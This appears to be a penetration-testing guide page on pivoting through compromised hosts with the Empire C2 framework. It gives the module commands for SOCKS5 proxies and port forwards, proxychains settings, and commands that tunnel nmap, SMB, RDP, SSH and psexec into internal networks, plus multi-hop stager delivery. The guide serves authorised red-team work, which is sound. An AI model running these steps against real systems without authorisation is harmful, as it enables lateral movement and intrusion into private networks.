6. Pivoting
Overviewβ
Pivoting in Empire is done through a SOCKS5 proxy running on the agent. Once the proxy is up, you route tools on the Kali operator machine through proxychains to reach internal network segments that are not directly accessible.
Standard pivot flow:
- Agent running on a pivot host (internal network access)
- Run
management/socks5module on the agent to open a SOCKS5 proxy - Add the proxy to
/etc/proxychains4.conf - Run any tool through
proxychainsto reach internal targets
Start a SOCKS5 Proxy on an Agentβ
(Empire: <PIVOT_AGENT>) > usemodule management/socks5
(Empire: management/socks5) > set Agent <PIVOT_AGENT>
(Empire: management/socks5) > set Port 1080
(Empire: management/socks5) > execute
The proxy listens on the Empire server's loopback (127.0.0.1:1080), not the target - traffic is tunneled through the agent's C2 channel to the internal network.
The SOCKS5 proxy runs as long as the agent is alive. If the agent dies, the proxy drops and all tunneled connections break.
Configure Proxychainsβ
# Edit proxychains config on Kali
sudo nano /etc/proxychains4.conf
At the bottom of the file, under [ProxyList], add:
socks5 127.0.0.1 1080
Ensure dynamic_chain is enabled (not strict_chain) for reliability:
dynamic_chain
Use Tools Through the Proxyβ
# Nmap through pivot - TCP connect scan only (-sT), no SYN scan
proxychains nmap -sT -Pn -p 22,80,443,445,3389 <INTERNAL_IP>
# SMB enumeration
proxychains smbclient -L //<INTERNAL_IP> -U '<DOMAIN>\<USERNAME>'%'<PASSWORD>'
# RDP through pivot
proxychains xfreerdp /v:<INTERNAL_IP> /u:<USERNAME> /p:'<PASSWORD>' /cert:ignore
# SSH through pivot
proxychains ssh <USERNAME>@<INTERNAL_IP>
# Impacket through pivot
proxychains impacket-psexec '<DOMAIN>/<USERNAME>:<PASSWORD>@<INTERNAL_IP>'
nmap through proxychains requires -sT (TCP connect scan). SYN scans (-sS) send raw packets that proxychains cannot proxy - they will either fail silently or scan the wrong target. Always use -sT -Pn when scanning through a proxy.
Port Forwarding (Single Service)β
For accessing a single service rather than routing all traffic through SOCKS, use management/invoke_portfwd to forward a specific port.
(Empire: <PIVOT_AGENT>) > usemodule management/invoke_portfwd
(Empire: management/invoke_portfwd) > set Agent <PIVOT_AGENT>
(Empire: management/invoke_portfwd) > set ListenPort 3389
(Empire: management/invoke_portfwd) > set ConnectHost <INTERNAL_TARGET_IP>
(Empire: management/invoke_portfwd) > set ConnectPort 3389
(Empire: management/invoke_portfwd) > execute
Then connect directly to 127.0.0.1:3389 on the operator machine to reach the internal target's RDP.
Multi-Hop Pivotingβ
For reaching networks two hops deep (e.g., attacking a host that is only reachable from an internal pivot host):
- Establish SOCKS5 on Pivot 1 (reachable from operator)
- Route a new stager delivery through proxychains to execute on Pivot 2
- When Pivot 2's agent checks in, run
management/socks5on it with a different port (e.g.,1081) - Add the second proxy to proxychains config
- Route tools through both proxies to reach Segment 2
# /etc/proxychains4.conf - two-hop example
socks5 127.0.0.1 1080 # Pivot 1
socks5 127.0.0.1 1081 # Pivot 2
ARP Scan Through Pivotβ
Discover live hosts on the internal network segment through the pivot agent without running Nmap:
(Empire: <PIVOT_AGENT>) > usemodule situational_awareness/network/arpscan
(Empire: situational_awareness/network/arpscan) > set Agent <PIVOT_AGENT>
(Empire: situational_awareness/network/arpscan) > set Range <SUBNET_CIDR>
(Empire: situational_awareness/network/arpscan) > execute
Standard Pivot Workflowβ
1. Gain agent on pivot host
2. Run management/socks5 on agent (Port 1080)
3. Update /etc/proxychains4.conf - add socks5 127.0.0.1 1080
4. proxychains nmap -sT -Pn <INTERNAL_SUBNET> - discover targets
5. proxychains <tool> against internal targets
6. Deliver stager to internal host via proxychains if needed for deeper access